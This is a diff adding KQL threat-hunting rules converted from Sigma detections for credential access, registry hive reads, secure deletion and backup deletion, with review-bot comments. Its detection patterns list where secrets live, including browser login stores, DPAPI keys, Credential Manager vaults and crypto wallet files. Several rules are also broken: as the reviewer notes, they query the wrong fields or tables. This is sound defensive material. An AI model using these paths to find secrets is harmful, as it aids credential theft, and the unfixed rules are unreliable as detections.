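Review bot: The two `endswith` tests on RegistryKey are mutually exclusive — one value cannot end with both `\\AppData\\Roaming\\Signal*` and `\\config.json` — and the `*` is a Sigma wildcard copied through as a literal character, so this predicate is never true; the same literal `*` reappears in the Windows Defender Exclusion List Modified hunk (`endswith "\\Microsoft\\Windows Defender\\Exclusions*"`), which therefore never matches either and should read `RegistryKey contains "\\Microsoft\\Windows Defender\\Exclusions\\"`. Separately, db.sqlite and config.json are files, not registry keys, so DeviceRegistryEvents.RegistryKey is the wrong table and field; the Potential Secure Deletion with SDelete, Suspicious Teams Application Related ObjectAcess Event, WCE wceaux.dll Access and WMI Persistence - Security hunks below have the same mismatch (their ObjectName values are file paths or, presumably, a WMI namespace), while the file_delete SDelete rule later in this diff shows the DeviceFileEvents/FolderPath form these should take. For this rule the intent is `DeviceFileEvents | where FolderPath contains "\\AppData\\Roaming\\Signal" and (FolderPath endswith "\\config.json" or FolderPath endswith "\\db.sqlite") and not(...)`, with a header note that DeviceFileEvents has no read-access ActionType, so "access" is approximated by create/modify/delete events.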
@@ -0,0 +1,13 @@
+// Title: Potential Secure Deletion with SDelete
+// Author: Thomas Patzke
+// Date: 2017-06-14
+// Level: medium
+// Description: Detects files that have extensions commonly seen while SDelete is used to wipe files.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.defense-evasion, attack.t1070.004, attack.t1027.005, attack.t1485, attack.t1553.002, attack.s0195
+// False Positives:
+// - Legitimate usage of SDelete
+// - Files that are interacted with that have these extensions legitimately
+
+DeviceRegistryEvents
+| where RegistryKey endswith ".AAA" or RegistryKey endswith ".ZZZ"
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/processes_accessing_the_microphone_and_webcam.kql b/KQL/rules/windows/builtin/security/processes_accessing_the_microphone_and_webcam.kql
new file mode 100644
index 00000000..b9354612
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/processes_accessing_the_microphone_and_webcam.kql
@@ -0,0 +1,10 @@
+// Title: Processes Accessing the Microphone and Webcam
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-06-07
+// Level: medium
+// Description: Potential adversaries accessing the microphone and webcam in an endpoint.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1123
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore\\microphone\\NonPackaged" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore\\webcam\\NonPackaged"
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/sam_registry_hive_handle_request.kql b/KQL/rules/windows/builtin/security/sam_registry_hive_handle_request.kql
new file mode 100644
index 00000000..42193b52
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/sam_registry_hive_handle_request.kql
@@ -0,0 +1,10 @@
+// Title: SAM Registry Hive Handle Request
+// Author: Roberto Rodriguez @Cyb3rWard0g
+// Date: 2019-08-12
+// Level: high
+// Description: Detects handles requested to SAM registry hive
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1012, attack.credential-access, attack.t1552.002
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SAM"
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/suspicious_teams_application_related_objectacess_event.kql b/KQL/rules/windows/builtin/security/suspicious_teams_application_related_objectacess_event.kql
new file mode 100644
index 00000000..d3577940
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/suspicious_teams_application_related_objectacess_event.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Teams Application Related ObjectAcess Event
+// Author: @SerkinValery
+// Date: 2022-09-16
+// Level: high
+// Description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1528
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\Microsoft\\Teams\\Cookies" or RegistryKey contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(InitiatingProcessFolderPath contains "\\Microsoft\\Teams\\current\\Teams.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/syskey_registry_keys_access.kql b/KQL/rules/windows/builtin/security/syskey_registry_keys_access.kql
new file mode 100644
index 00000000..ddf7c896
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/syskey_registry_keys_access.kql
@@ -0,0 +1,10 @@
+// Title: SysKey Registry Keys Access
+// Author: Roberto Rodriguez @Cyb3rWard0g
+// Date: 2019-08-12
+// Level: high
+// Description: Detects handle requests and access operations to specific registry keys to calculate the SysKey
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1012
+
+DeviceRegistryEvents
+| where RegistryKey endswith "lsa\\JD" or RegistryKey endswith "lsa\\GBG" or RegistryKey endswith "lsa\\Skew1" or RegistryKey endswith "lsa\\Data"
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/wce_wceaux_dll_access.kql b/KQL/rules/windows/builtin/security/wce_wceaux_dll_access.kql
new file mode 100644
index 00000000..8983af2a
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/wce_wceaux_dll_access.kql
@@ -0,0 +1,10 @@
+// Title: WCE wceaux.dll Access
+// Author: Thomas Patzke
+// Date: 2017-06-14
+// Level: critical
+// Description: Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003, attack.s0005
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\wceaux.dll"
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/windows_defender_exclusion_list_modified.kql b/KQL/rules/windows/builtin/security/windows_defender_exclusion_list_modified.kql
new file mode 100644
index 00000000..fe85c5a5
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/windows_defender_exclusion_list_modified.kql
@@ -0,0 +1,12 @@
+// Title: Windows Defender Exclusion List Modified
+// Author: @BarryShooshooga
+// Date: 2019-10-26
+// Level: medium
+// Description: Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Intended exclusions by administrators
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Microsoft\\Windows Defender\\Exclusions*"
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/wmi_persistence_security.kql b/KQL/rules/windows/builtin/security/wmi_persistence_security.kql
new file mode 100644
index 00000000..7a92d7b3
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/wmi_persistence_security.kql
@@ -0,0 +1,12 @@
+// Title: WMI Persistence - Security
+// Author: Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community
+// Date: 2017-08-22
+// Level: medium
+// Description: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.003
+// False Positives:
+// - Unknown (data set is too small; further testing needed)
+
+DeviceRegistryEvents
+| where RegistryKey contains "subscription"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_access/access_to_crypto_currency_wallets_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/access_to_crypto_currency_wallets_by_uncommon_applications.kql
new file mode 100644
index 00000000..6d4e9790
--- /dev/null
+++ b/KQL/rules/windows/file/file_access/access_to_crypto_currency_wallets_by_uncommon_applications.kql
@@ -0,0 +1,16 @@
+// Title: Access To Crypto Currency Wallets By Uncommon Applications
+// Author: X__Junior (Nextron Systems)
+// Date: 2024-07-29
+// Level: medium
+// Description: Detects file access requests to crypto currency files by uncommon processes.
+// Could indicate potential attempt of crypto currency wallet stealing.
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access
+// False Positives:
+// - Antivirus, Anti-Spyware, Anti-Malware Software
+// - Backup software
+// - Legitimate software installed on partitions other than "C:\"
+// - Searching software such as "everything.exe"
+
+DeviceFileEvents
+| where ((FileName contains "\\AppData\\Roaming\\Ethereum\\keystore\\" or FileName contains "\\AppData\\Roaming\\EthereumClassic\\keystore\\" or FileName contains "\\AppData\\Roaming\\monero\\wallets\\") or (FileName endswith "\\AppData\\Roaming\\Bitcoin\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\BitcoinABC\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\BitcoinSV\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\DashCore\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\DogeCoin\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\Litecoin\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\Ripple\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\Zcash\\wallet.dat")) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not(((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe") and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\")))
\ No newline at end of file
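Review bot: Every path predicate here is on FileName (`FileName contains "\\AppData\\Roaming\\Ethereum\\keystore\\"`, `FileName endswith "\\AppData\\Roaming\\Bitcoin\\wallet.dat"`), but in DeviceFileEvents FileName holds only the leaf name while the full path is FolderPath, so none of these conditions can match and the rule is dead on arrival; the file_delete hunks later in this diff use FolderPath for the same purpose, which is the form to follow. The same FileName mistake runs through the Sysvol hunk (where `FileName startswith "\\"` is likewise impossible), the CREDHIST, DPAPI master key, Credential Manager, Teams and browser credential storage hunks that follow — replacing `FileName` with `FolderPath` in the path predicates fixes all of them, and the `InitiatingProcessFolderPath` exclusions are already correct. These source rules are Security 4663 file_access rules, and DeviceFileEvents has no read-access ActionType, so even after the fix the rule sees creates, modifications, renames and deletes of the wallet files rather than reads; that limitation belongs in the header comment so the detection gap is understood.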
diff --git a/KQL/rules/windows/file/file_access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql
new file mode 100644
index 00000000..0a07ab8a
--- /dev/null
+++ b/KQL/rules/windows/file/file_access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql
@@ -0,0 +1,10 @@
+// Title: Access To Potentially Sensitive Sysvol Files By Uncommon Applications
+// Author: frack113
+// Date: 2023-12-21
+// Level: medium
+// Description: Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006
+
+DeviceFileEvents
+| where ((FileName contains "\\sysvol\\" and FileName contains "\\Policies\\") and (FileName endswith "audit.csv" or FileName endswith "Files.xml" or FileName endswith "GptTmpl.inf" or FileName endswith "groups.xml" or FileName endswith "Registry.pol" or FileName endswith "Registry.xml" or FileName endswith "scheduledtasks.xml" or FileName endswith "scripts.ini" or FileName endswith "services.xml") and FileName startswith "\\") and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_access/access_to_windows_credential_history_file_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/access_to_windows_credential_history_file_by_uncommon_applications.kql
new file mode 100644
index 00000000..1ae442a2
--- /dev/null
+++ b/KQL/rules/windows/file/file_access/access_to_windows_credential_history_file_by_uncommon_applications.kql
@@ -0,0 +1,11 @@
+// Title: Access To Windows Credential History File By Uncommon Applications
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-17
+// Level: medium
+// Description: Detects file access requests to the Windows Credential History File by an uncommon application.
+// This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.004
+
+DeviceFileEvents
+| where FileName endswith "\\Microsoft\\Protect\\CREDHIST" and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql
new file mode 100644
index 00000000..631e6f79
--- /dev/null
+++ b/KQL/rules/windows/file/file_access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql
@@ -0,0 +1,11 @@
+// Title: Access To Windows DPAPI Master Keys By Uncommon Applications
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-17
+// Level: medium
+// Description: Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application.
+// This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.004
+
+DeviceFileEvents
+| where (FileName contains "\\Microsoft\\Protect\\S-1-5-18\\" or FileName contains "\\Microsoft\\Protect\\S-1-5-21-") and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_access/credential_manager_access_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/credential_manager_access_by_uncommon_applications.kql
new file mode 100644
index 00000000..198e3fad
--- /dev/null
+++ b/KQL/rules/windows/file/file_access/credential_manager_access_by_uncommon_applications.kql
@@ -0,0 +1,13 @@
+// Title: Credential Manager Access By Uncommon Applications
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-11
+// Level: medium
+// Description: Detects suspicious processes based on name and location that access the windows credential manager and vault.
+// Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access
+// False Positives:
+// - Legitimate software installed by the users for example in the "AppData" directory may access these files (for any reason).
+
+DeviceFileEvents
+| where (FileName contains "\\AppData\\Local\\Microsoft\\Credentials\\" or FileName contains "\\AppData\\Roaming\\Microsoft\\Credentials\\" or FileName contains "\\AppData\\Local\\Microsoft\\Vault\\" or FileName contains "\\ProgramData\\Microsoft\\Vault\\") and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql
new file mode 100644
index 00000000..5c885f46
--- /dev/null
+++ b/KQL/rules/windows/file/file_access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql
@@ -0,0 +1,10 @@
+// Title: Microsoft Teams Sensitive File Access By Uncommon Applications
+// Author: @SerkinValery
+// Date: 2024-07-22
+// Level: medium
+// Description: Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1528
+
+DeviceFileEvents
+| where (FileName contains "\\Microsoft\\Teams\\Cookies" or FileName contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(InitiatingProcessFolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_access/suspicious_file_access_to_browser_credential_storage.kql b/KQL/rules/windows/file/file_access/suspicious_file_access_to_browser_credential_storage.kql
new file mode 100644
index 00000000..d5163b72
--- /dev/null
+++ b/KQL/rules/windows/file/file_access/suspicious_file_access_to_browser_credential_storage.kql
@@ -0,0 +1,16 @@
+// Title: Suspicious File Access to Browser Credential Storage
+// Author: frack113, X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems), Parth-FourCore
+// Date: 2025-05-22
+// Level: low
+// Description: Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts.
+// Adversaries may attempt to access browser credential storage to extract sensitive information such as usernames and passwords or cookies.
+// This behavior is often commonly observed in credential stealing malware.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.003, attack.discovery, attack.t1217
+// False Positives:
+// - Antivirus, Anti-Spyware, Anti-Malware Software
+// - Legitimate software accessing browser data for synchronization or backup purposes.
+// - Legitimate software installed on partitions other than "C:\"
+
+DeviceFileEvents
+| where ((FileName contains "\\Sputnik\\Sputnik" or FileName contains "\\MapleStudio\\ChromePlus" or FileName contains "\\QIP Surf" or FileName contains "\\BlackHawk" or FileName contains "\\7Star\\7Star" or FileName contains "\\CatalinaGroup\\Citrio" or FileName contains "\\Google\\Chrome" or FileName contains "\\Coowon\\Coowon" or FileName contains "\\CocCoc\\Browser" or FileName contains "\\uCozMedia\\Uran" or FileName contains "\\Tencent\\QQBrowser" or FileName contains "\\Orbitum" or FileName contains "\\Slimjet" or FileName contains "\\Iridium" or FileName contains "\\Vivaldi" or FileName contains "\\Chromium" or FileName contains "\\GhostBrowser" or FileName contains "\\CentBrowser" or FileName contains "\\Xvast" or FileName contains "\\Chedot" or FileName contains "\\SuperBird" or FileName contains "\\360Browser\\Browser" or FileName contains "\\360Chrome\\Chrome" or FileName contains "\\Comodo\\Dragon" or FileName contains "\\BraveSoftware\\Brave-Browser" or FileName contains "\\Torch" or FileName contains 
"\\UCBrowser\\" or FileName contains "\\Blisk" or FileName contains "\\Epic Privacy Browser" or FileName contains "\\Nichrome" or FileName contains "\\Amigo" or FileName contains "\\Kometa" or FileName contains "\\Xpom" or FileName contains "\\Microsoft\\Edge" or FileName contains "\\Liebao7Default\\EncryptedStorage" or FileName contains "\\AVAST Software\\Browser" or FileName contains "\\Kinza" or FileName contains "\\Mozilla\\SeaMonkey\\" or FileName contains "\\Comodo\\IceDragon\\" or FileName contains "\\8pecxstudios\\Cyberfox\\" or FileName contains "\\FlashPeak\\SlimBrowser\\" or FileName contains "\\Moonchild Productions\\Pale Moon\\") and (FileName contains "\\Profiles\\" or FileName contains "\\User Data") and ((FileName contains "\\Login Data" or FileName contains "\\Cookies" or FileName contains "\\EncryptedStorage" or FileName contains "\\WebCache\\") or (FileName endswith "cert9.db" or FileName endswith "cookies.sqlite" or FileName endswith "formhistory.sqlite" or FileName endswith "key3.db" or FileName endswith "key4.db" or FileName endswith "Login Data.sqlite" or FileName endswith "logins.json" or FileName endswith "places.sqlite"))) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or (InitiatingProcessFolderPath endswith "\\Sputnik.exe" or InitiatingProcessFolderPath endswith "\\ChromePlus.exe" or InitiatingProcessFolderPath endswith "\\QIP Surf.exe" or InitiatingProcessFolderPath endswith "\\BlackHawk.exe" or InitiatingProcessFolderPath endswith "\\7Star.exe" or InitiatingProcessFolderPath endswith "\\Sleipnir5.exe" or InitiatingProcessFolderPath endswith "\\Citrio.exe" or InitiatingProcessFolderPath endswith "\\Chrome SxS.exe" or InitiatingProcessFolderPath endswith "\\Chrome.exe" or InitiatingProcessFolderPath endswith 
"\\Coowon.exe" or InitiatingProcessFolderPath endswith "\\CocCocBrowser.exe" or InitiatingProcessFolderPath endswith "\\Uran.exe" or InitiatingProcessFolderPath endswith "\\QQBrowser.exe" or InitiatingProcessFolderPath endswith "\\Orbitum.exe" or InitiatingProcessFolderPath endswith "\\Slimjet.exe" or InitiatingProcessFolderPath endswith "\\Iridium.exe" or InitiatingProcessFolderPath endswith "\\Vivaldi.exe" or InitiatingProcessFolderPath endswith "\\Chromium.exe" or InitiatingProcessFolderPath endswith "\\GhostBrowser.exe" or InitiatingProcessFolderPath endswith "\\CentBrowser.exe" or InitiatingProcessFolderPath endswith "\\Xvast.exe" or InitiatingProcessFolderPath endswith "\\Chedot.exe" or InitiatingProcessFolderPath endswith "\\SuperBird.exe" or InitiatingProcessFolderPath endswith "\\360Browser.exe" or InitiatingProcessFolderPath endswith "\\360Chrome.exe" or InitiatingProcessFolderPath endswith "\\dragon.exe" or InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\torch.exe" or InitiatingProcessFolderPath endswith "\\UCBrowser.exe" or InitiatingProcessFolderPath endswith "\\BliskBrowser.exe" or InitiatingProcessFolderPath endswith "\\Epic Privacy Browser.exe" or InitiatingProcessFolderPath endswith "\\nichrome.exe" or InitiatingProcessFolderPath endswith "\\AmigoBrowser.exe" or InitiatingProcessFolderPath endswith "\\KometaBrowser.exe" or InitiatingProcessFolderPath endswith "\\XpomBrowser.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\LiebaoBrowser.exe" or InitiatingProcessFolderPath endswith "\\AvastBrowser.exe" or InitiatingProcessFolderPath endswith "\\Kinza.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\icedragon.exe" or InitiatingProcessFolderPath endswith "\\cyberfox.exe" or InitiatingProcessFolderPath endswith "\\SlimBrowser.exe" or InitiatingProcessFolderPath endswith "\\palemoon.exe") or 
(InitiatingProcessFolderPath contains "\\Sputnik\\" or InitiatingProcessFolderPath contains "\\MapleStudio\\" or InitiatingProcessFolderPath contains "\\QIP Surf\\" or InitiatingProcessFolderPath contains "\\BlackHawk\\" or InitiatingProcessFolderPath contains "\\7Star\\" or InitiatingProcessFolderPath contains "\\Fenrir Inc\\" or InitiatingProcessFolderPath contains "\\CatalinaGroup\\" or InitiatingProcessFolderPath contains "\\Google\\" or InitiatingProcessFolderPath contains "\\Coowon\\" or InitiatingProcessFolderPath contains "\\CocCoc\\" or InitiatingProcessFolderPath contains "\\uCozMedia\\" or InitiatingProcessFolderPath contains "\\Tencent\\" or InitiatingProcessFolderPath contains "\\Orbitum\\" or InitiatingProcessFolderPath contains "\\Slimjet\\" or InitiatingProcessFolderPath contains "\\Iridium\\" or InitiatingProcessFolderPath contains "\\Vivaldi\\" or InitiatingProcessFolderPath contains "\\Chromium\\" or InitiatingProcessFolderPath contains "\\GhostBrowser\\" or InitiatingProcessFolderPath contains "\\CentBrowser\\" or InitiatingProcessFolderPath contains "\\Xvast\\" or InitiatingProcessFolderPath contains "\\Chedot\\" or InitiatingProcessFolderPath contains "\\SuperBird\\" or InitiatingProcessFolderPath contains "\\360Browser\\" or InitiatingProcessFolderPath contains "\\360Chrome\\" or InitiatingProcessFolderPath contains "\\Comodo\\" or InitiatingProcessFolderPath contains "\\BraveSoftware\\" or InitiatingProcessFolderPath contains "\\Torch\\" or InitiatingProcessFolderPath contains "\\UCBrowser\\" or InitiatingProcessFolderPath contains "\\Blisk\\" or InitiatingProcessFolderPath contains "\\Epic Privacy Browser\\" or InitiatingProcessFolderPath contains "\\Nichrome\\" or InitiatingProcessFolderPath contains "\\Amigo\\" or InitiatingProcessFolderPath contains "\\Kometa\\" or InitiatingProcessFolderPath contains "\\Xpom\\" or InitiatingProcessFolderPath contains "\\Microsoft\\" or InitiatingProcessFolderPath contains "\\Liebao7\\" or 
InitiatingProcessFolderPath contains "\\AVAST Software\\" or InitiatingProcessFolderPath contains "\\Kinza\\" or InitiatingProcessFolderPath contains "\\Mozilla\\" or InitiatingProcessFolderPath contains "\\8pecxstudios\\" or InitiatingProcessFolderPath contains "\\FlashPeak\\" or InitiatingProcessFolderPath contains "\\Moonchild Productions\\") or (InitiatingProcessFolderPath =~ "System" and InitiatingProcessParentFileName =~ "Idle")))) and (not(((InitiatingProcessFolderPath contains "\\Microsoft\\Windows Defender\\" and (InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe")) or InitiatingProcessParentFileName =~ "msiexec.exe" or InitiatingProcessFolderPath endswith "\\everything.exe" or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_change/unusual_file_modification_by_dns_exe.kql b/KQL/rules/windows/file/file_change/unusual_file_modification_by_dns_exe.kql
new file mode 100644
index 00000000..8b8676a8
--- /dev/null
+++ b/KQL/rules/windows/file/file_change/unusual_file_modification_by_dns_exe.kql
@@ -0,0 +1,10 @@
+// Title: Unusual File Modification by dns.exe
+// Author: Tim Rauch (Nextron Systems), Elastic (idea)
+// Date: 2022-09-27
+// Level: high
+// Description: Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\dns.log"))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_delete/ads_zone_identifier_deleted_by_uncommon_application.kql b/KQL/rules/windows/file/file_delete/ads_zone_identifier_deleted_by_uncommon_application.kql
new file mode 100644
index 00000000..c81b7387
--- /dev/null
+++ b/KQL/rules/windows/file/file_delete/ads_zone_identifier_deleted_by_uncommon_application.kql
@@ -0,0 +1,12 @@
+// Title: ADS Zone.Identifier Deleted By Uncommon Application
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+// False Positives:
+// - Other third party applications not listed.
+
+DeviceFileEvents
+| where FolderPath endswith ":Zone.Identifier" and (not((InitiatingProcessFolderPath in~ ("C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\SysWOW64\\explorer.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe")))))
\ No newline at end of file
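Review bot: Nothing in the predicate restricts the event to a deletion — `FolderPath endswith ":Zone.Identifier"` on DeviceFileEvents also matches the FileCreated/FileModified rows written whenever a non-browser downloader tags a file, which is routine activity and the opposite of what the title describes. The source rule is a file_delete category rule, so this hunk needs an ActionType conjunct, `| where ActionType == "FileDeleted" and FolderPath endswith ":Zone.Identifier" and (not((...` with the rest unchanged; the same omission applies to the Backup Files Deleted, EventLog EVTX File Deleted, Exchange PowerShell Cmdlet History Deleted, File Deleted Via Sysinternals SDelete and IIS WebServer Access Logs Deleted hunks that follow, where an unfiltered `.evtx` or `.log` path match fires on every ordinary write to those files. This looks like the converter dropping the Sigma category when it picks the table, so the fix belongs in the conversion step rather than in each generated file.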
diff --git a/KQL/rules/windows/file/file_delete/backup_files_deleted.kql b/KQL/rules/windows/file/file_delete/backup_files_deleted.kql
new file mode 100644
index 00000000..dc38bd01
--- /dev/null
+++ b/KQL/rules/windows/file/file_delete/backup_files_deleted.kql
@@ -0,0 +1,12 @@
+// Title: Backup Files Deleted
+// Author: frack113
+// Date: 2022-01-02
+// Level: medium
+// Description: Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Legitimate usage
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wt.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe") and (FolderPath endswith ".VHD" or FolderPath endswith ".bac" or FolderPath endswith ".bak" or FolderPath endswith ".wbcat" or FolderPath endswith ".bkf" or FolderPath endswith ".set" or FolderPath endswith ".win" or FolderPath endswith ".dsk")
\ No newline at end of file
